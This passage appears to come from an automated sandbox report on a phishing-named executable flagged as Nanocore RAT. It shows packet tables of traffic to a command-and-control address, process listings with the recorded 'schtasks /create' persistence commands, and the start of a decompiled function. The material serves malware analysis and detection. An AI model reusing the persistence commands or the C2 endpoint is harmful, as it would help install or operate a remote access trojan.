Sep 15, 2021 06:15:26.350351095 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.351048946 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.351140022 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.352145910 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.394818068 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.515377998 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.515444994 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.516112089 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.516426086 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.529361010 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.529411077 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.529628992 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.530288935 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.530332088 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.530406952 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.531238079 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.531277895 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.531335115 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.532135010 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.532174110 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.532232046 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.533143044 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.533184052 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.533232927 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.534193993 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.534231901 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.534291983 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.535341978 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.535381079 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.535849094 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.536181927 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.536276102 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.537260056 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.537302017 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.537391901 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.538414955 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.538455963 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.538547039 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.539182901 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.539383888 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.539500952 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.548324108 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.548369884 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.548432112 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.548482895 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.548528910 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.548561096 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.548569918 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.548645973 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.548723936 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.548741102 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.548784018 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.548875093 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.553277016 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.553323984 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.553359032 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.553431988 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.553524971 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.553587914 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.553607941 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.553631067 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.553715944 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.553778887 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.553838968 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.553915024 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.553992033 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.554055929 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.554095984 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.554127932 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.554210901 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.554310083 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.554414988 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.554455042 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.554539919 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.555068970 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.556231976 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.556273937 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.556322098 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.557185888 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.557234049 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.557272911 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.558088064 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.558166981 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.563333035 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.613447905 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.708105087 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.709141970 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.709194899 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.709322929 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.709353924 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.709414959 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.710256100 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.710314989 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.710433960 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.711225986 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.712001085 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.712104082 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.712186098 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.713022947 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.713103056 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.713136911 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.714009047 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.714092970 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.715081930 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.715179920 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.715275049 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.716089010 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.716129065 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:26.716232061 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:26.893543959 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:27.236067057 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:27.250390053 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:27.424082994 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:27.431569099 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:27.600912094 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:27.601140976 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:27.773896933 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:27.774243116 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:28.167001963 CEST	8907	49799	185.140.53.8	192.168.2.3
Sep 15, 2021 06:15:28.167114019 CEST	49799	8907	192.168.2.3	185.140.53.8
Sep 15, 2021 06:15:28.542890072 CEST	8907	49799	185.140.53.8	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 15, 2021 06:13:14.766994953 CEST	49199	53	192.168.2.3	8.8.8.8
Sep 15, 2021 06:13:14.796416998 CEST	53	49199	8.8.8.8	192.168.2.3
Sep 15, 2021 06:13:41.778148890 CEST	50620	53	192.168.2.3	8.8.8.8
Sep 15, 2021 06:13:41.815077066 CEST	53	50620	8.8.8.8	192.168.2.3
Sep 15, 2021 06:13:45.752944946 CEST	64938	53	192.168.2.3	8.8.8.8
Sep 15, 2021 06:13:45.786088943 CEST	53	64938	8.8.8.8	192.168.2.3
Sep 15, 2021 06:14:05.316644907 CEST	60152	53	192.168.2.3	8.8.8.8
Sep 15, 2021 06:14:05.360161066 CEST	53	60152	8.8.8.8	192.168.2.3
Sep 15, 2021 06:14:20.634927034 CEST	57544	53	192.168.2.3	8.8.8.8
Sep 15, 2021 06:14:20.683238983 CEST	53	57544	8.8.8.8	192.168.2.3
Sep 15, 2021 06:14:23.132409096 CEST	55984	53	192.168.2.3	8.8.8.8
Sep 15, 2021 06:14:23.161971092 CEST	53	55984	8.8.8.8	192.168.2.3
Sep 15, 2021 06:14:57.416039944 CEST	64185	53	192.168.2.3	8.8.8.8
Sep 15, 2021 06:14:57.450490952 CEST	53	64185	8.8.8.8	192.168.2.3
Sep 15, 2021 06:14:58.750438929 CEST	65110	53	192.168.2.3	8.8.8.8
Sep 15, 2021 06:14:58.792069912 CEST	53	65110	8.8.8.8	192.168.2.3

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: P0 (2021)-2790 new order.exe PID: 6380 Parent PID: 2308

General

Start time:	06:13:17
Start date:	15/09/2021
Path:	C:\Users\user\Desktop\P0 (2021)-2790 new order.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\P0 (2021)-2790 new order.exe'
Imagebase:	0xa30000
File size:	349184 bytes
MD5 hash:	394FF651C9FA2BFCA16C32FB117514E1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.223144000.0000000002720000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000000.00000002.223144000.0000000002720000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.223144000.0000000002720000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000002.223144000.0000000002720000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Chronological Activities

Analysis Process: conhost.exe PID: 6388 Parent PID: 6380

General

Start time:	06:13:18
Start date:	15/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: MSBuild.exe PID: 6440 Parent PID: 6380

General

Start time:	06:13:18
Start date:	15/09/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\P0 (2021)-2790 new order.exe'
Imagebase:	0x9e0000
File size:	69632 bytes
MD5 hash:	88BBB7610152B48C2B3879473B17857E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.479823366.0000000000402000.00000040.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.479823366.0000000000402000.00000040.00020000.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000002.00000002.479823366.0000000000402000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.484597915.00000000040C9000.00000004.00000001.sdmp, Author: Joe Security Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.485007729.0000000005A20000.00000004.00020000.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.485007729.0000000005A20000.00000004.00020000.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.485086472.0000000005CC0000.00000004.00020000.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.485086472.0000000005CC0000.00000004.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.485086472.0000000005CC0000.00000004.00020000.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: schtasks.exe PID: 6652 Parent PID: 6440

General

Start time:	06:13:22
Start date:	15/09/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp7C69.tmp'
Imagebase:	0x940000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6676 Parent PID: 6652

General

Start time:	06:13:22
Start date:	15/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: schtasks.exe PID: 6724 Parent PID: 6440

General

Start time:	06:13:23
Start date:	15/09/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp8052.tmp'
Imagebase:	0x940000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6732 Parent PID: 6724

General

Start time:	06:13:23
Start date:	15/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: MSBuild.exe PID: 6824 Parent PID: 528

General

Start time:	06:13:25
Start date:	15/09/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 0
Imagebase:	0xfb0000
File size:	69632 bytes
MD5 hash:	88BBB7610152B48C2B3879473B17857E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Chronological Activities

Analysis Process: conhost.exe PID: 6832 Parent PID: 6824

General

Start time:	06:13:25
Start date:	15/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: dhcpmon.exe PID: 6840 Parent PID: 528

General

Start time:	06:13:25
Start date:	15/09/2021
Path:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
Imagebase:	0x40000
File size:	69632 bytes
MD5 hash:	88BBB7610152B48C2B3879473B17857E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 1%, Virustotal, Browse Detection: 0%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	moderate

Chronological Activities

Analysis Process: conhost.exe PID: 6848 Parent PID: 6840

General

Start time:	06:13:26
Start date:	15/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: dhcpmon.exe PID: 7028 Parent PID: 3388

General

Start time:	06:13:31
Start date:	15/09/2021
Path:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
Imagebase:	0xf60000
File size:	69632 bytes
MD5 hash:	88BBB7610152B48C2B3879473B17857E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Chronological Activities

Analysis Process: conhost.exe PID: 7036 Parent PID: 7028

General

Start time:	06:13:31
Start date:	15/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: P0 (2021)-2790 new order.exe PID: 6380 Parent PID: 2308 P0 (2021)-2790 new order.exeCOMMON

Executed Functions

Function 00A31670, Relevance: 361.3, APIs: 6, Strings: 200, Instructions: 763
stringmemorywindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A31670(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				signed int _v28;
				char _v31;
				char _v32;
				char _v33;
				char _v34;
				char _v35;
				char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				char _v49;
				char _v50;
				char _v51;
				char _v52;
				char _v53;
				char _v54;
				char _v55;
				char _v56;
				char _v57;
				char _v58;
				char _v59;
				char _v60;
				char _v61;
				char _v62;
				char _v63;
				char _v64;
				char _v65;
				char _v66;
				char _v67;
				char _v68;
				char _v69;
				char _v70;
				char _v71;
				char _v72;
				char _v73;
				char _v74;
				char _v75;
				char _v76;
				char _v77;
				char _v78;
				char _v79;
				char _v80;
				char _v81;
				char _v82;
				char _v83;
				char _v84;
				char _v85;
				char _v86;
				char _v87;
				char _v88;
				char _v89;
				char _v90;
				char _v91;
				char _v92;
				char _v93;
				char _v94;
				char _v95;
				char _v96;
				char _v97;
				char _v98;
				char _v99;
				char _v100;
				char _v101;
				char _v102;
				char _v103;
				char _v104;
				char _v105;
				char _v106;
				char _v107;
				char _v108;
				char _v109;
				char _v110;
				char _v111;
				char _v112;
				char _v113;
				char _v114;
				char _v115;
				char _v116;
				char _v117;
				char _v118;
				char _v119;
				char _v120;
				char _v121;
				char _v122;
				char _v123;
				char _v124;
				char _v125;
				char _v126;
				char _v127;
				char _v128;
				char _v129;
				char _v130;
				char _v131;
				char _v132;
				char _v133;
				char _v134;
				char _v135;
				char _v136;
				char _v137;
				char _v138;
				char _v139;
				char _v140;
				char _v141;
				char _v142;
				char _v143;
				char _v144;
				char _v145;
				char _v146;
				char _v147;
				char _v148;
				char _v149;
				char _v150;
				char _v151;
				char _v152;
				char _v153;
				char _v154;
				char _v155;
				char _v156;
				char _v157;
				char _v158;
				char _v159;
				char _v160;
				char _v161;
				char _v162;
				char _v163;
				char _v164;
				char _v165;
				char _v166;
				char _v167;
				char _v168;
				char _v169;
				char _v170;
				char _v171;
				char _v172;
				char _v173;
				char _v174;
				char _v175;
				char _v176;
				char _v177;
				char _v178;
				char _v179;
				char _v180;
				char _v181;
				char _v182;
				char _v183;
				char _v184;
				char _v185;
				char _v186;
				char _v187;
				char _v188;
				char _v189;
				char _v190;
				char _v191;
				char _v192;
				char _v193;
				char _v194;
				char _v195;
				char _v196;
				char _v197;
				char _v198;
				char _v199;
				char _v200;
				char _v201;
				char _v202;
				char _v203;
				char _v204;
				char _v205;
				char _v206;
				char _v207;
				char _v208;
				char _v209;
				char _v210;
				char _v211;
				char _v212;
				char _v213;
				char _v214;
				char _v215;
				char _v216;
				char _v217;
				char _v218;
				char _v219;
				char _v220;
				char _v221;
				char _v222;
				char _v223;
				char _v224;
				char _v225;
				char _v226;
				char _v227;
				char _v228;
				char _v229;
				char _v230;
				char _v231;
				char _v232;
				char _v233;
				char _v234;
				char _v235;
				char _v236;
				char _v237;
				char _v238;
				char _v239;
				char _v240;
				char _v241;
				char _v242;
				char _v243;
				char _v244;
				char _v245;
				char _v246;
				char _v247;
				char _v248;
				char _v249;
				char _v250;
				char _v251;
				char _v252;
				char _v253;
				char _v254;
				char _v255;
				char _v256;
				char _v257;
				char _v258;
				char _v259;
				char _v260;
				char _v261;
				char _v262;
				char _v263;
				char _v264;
				char _v265;
				char _v266;
				char _v267;
				char _v268;
				char _v269;
				char _v270;
				char _v271;
				char _v272;
				char _v273;
				char _v274;
				char _v275;
				char _v276;
				char _v277;
				char _v278;
				char _v279;
				char _v280;
				char _v281;
				char _v282;
				char _v283;
				char _v284;
				char _v285;
				char _v286;
				char _v287;
				char _v288;
				char _v289;
				char _v290;
				char _v291;
				char _v292;
				char _v293;
				char _v294;
				char _v295;
				char _v296;
				char _v297;
				char _v298;
				char _v299;
				char _v300;
				char _v301;
				char _v302;
				char _v303;
				char _v304;
				char _v305;
				char _v306;
				char _v307;
				char _v308;
				char _v309;
				char _v310;
				char _v311;
				char _v312;
				char _v313;
				char _v314;
				char _v315;
				char _v316;
				char _v317;
				char _v318;
				char _v319;
				char _v320;
				char _v321;
				char _v322;
				char _v323;
				char _v324;
				char _v325;
				char _v326;
				char _v327;
				char _v328;
				char _v329;
				char _v330;
				char _v331;
				char _v332;
				char _v333;
				char _v334;
				char _v335;
				char _v336;
				char _v337;
				char _v338;
				char _v339;
				char _v340;
				char _v341;
				char _v342;
				char _v343;
				char _v344;
				char _v345;
				char _v346;
				char _v347;
				char _v348;
				char _v349;
				char _v350;
				char _v351;
				char _v352;
				char _v353;
				char _v354;
				char _v355;
				char _v356;
				char _v357;
				char _v358;
				char _v359;
				char _v360;
				char _v361;
				char _v362;
				char _v363;
				char _v364;
				char _v365;
				char _v366;
				char _v367;
				char _v368;
				char _v369;
				char _v370;
				char _v371;
				char _v372;
				char _v373;
				char _v374;
				char _v375;
				char _v376;
				char _v377;
				char _v378;
				char _v379;
				char _v380;
				char _v381;
				char _v382;
				char _v383;
				char _v384;
				char _v385;
				char _v386;
				char _v387;
				char _v388;
				char _v389;
				char _v390;
				char _v391;
				char _v392;
				char _v393;
				char _v394;
				char _v395;
				char _v396;
				char _v397;
				char _v398;
				char _v399;
				char _v400;
				char _v401;
				char _v402;
				char _v403;
				char _v404;
				char _v405;
				char _v406;
				char _v407;
				char _v408;
				char _v409;
				char _v410;
				char _v411;
				char _v412;
				char _v413;
				char _v414;
				char _v415;
				char _v416;
				char _v417;
				char _v418;
				char _v419;
				char _v420;
				char _v421;
				char _v422;
				char _v423;
				char _v424;
				char _v425;
				char _v426;
				char _v427;
				char _v428;
				char _v429;
				char _v430;
				char _v431;
				char _v432;
				char _v433;
				char _v434;
				char _v435;
				char _v436;
				char _v437;
				char _v438;
				char _v439;
				char _v440;
				char _v441;
				char _v442;
				char _v443;
				char _v444;
				char _v445;
				char _v446;
				char _v447;
				char _v448;
				char _v449;
				char _v450;
				char _v451;
				char _v452;
				char _v453;
				char _v454;
				char _v455;
				char _v456;
				char _v457;
				char _v458;
				char _v459;
				char _v460;
				char _v461;
				char _v462;
				char _v463;
				char _v464;
				char _v465;
				char _v466;
				char _v467;
				char _v468;
				char _v469;
				char _v470;
				char _v471;
				char _v472;
				char _v473;
				char _v474;
				char _v475;
				char _v476;
				char _v477;
				char _v478;
				char _v479;
				char _v480;
				char _v481;
				char _v482;
				char _v483;
				char _v484;
				char _v485;
				char _v486;
				char _v487;
				char _v488;
				char _v489;
				char _v490;
				char _v491;
				char _v492;
				char _v493;
				char _v494;
				char _v495;
				char _v496;
				char _v497;
				char _v498;
				char _v499;
				char _v500;
				char _v501;
				char _v502;
				char _v503;
				char _v504;
				char _v505;
				char _v506;
				char _v507;
				char _v508;
				char _v509;
				char _v510;
				char _v511;
				char _v512;
				char _v513;
				char _v514;
				char _v515;
				char _v516;
				char _v517;
				char _v518;
				char _v519;
				char _v520;
				char _v521;
				char _v522;
				char _v523;
				char _v524;
				char _v525;
				char _v526;
				char _v527;
				char _v528;
				char _v529;
				char _v530;
				char _v531;
				char _v532;
				char _v533;
				char _v534;
				char _v535;
				char _v536;
				char _v537;
				char _v538;
				char _v539;
				char _v540;
				char _v541;
				char _v542;
				char _v543;
				char _v544;
				char _v545;
				char _v546;
				char _v547;
				char _v548;
				char _v549;
				char _v550;
				char _v551;
				char _v552;
				char _v553;
				char _v554;
				char _v555;
				char _v556;
				char _v557;
				char _v558;
				char _v559;
				char _v560;
				char _v561;
				char _v562;
				char _v563;
				char _v564;
				char _v565;
				char _v566;
				char _v567;
				char _v568;
				char _v569;
				char _v570;
				char _v571;
				char _v572;
				char _v573;
				char _v574;
				char _v575;
				char _v576;
				char _v577;
				char _v578;
				char _v579;
				char _v580;
				char _v581;
				char _v582;
				char _v583;
				char _v584;
				char _v585;
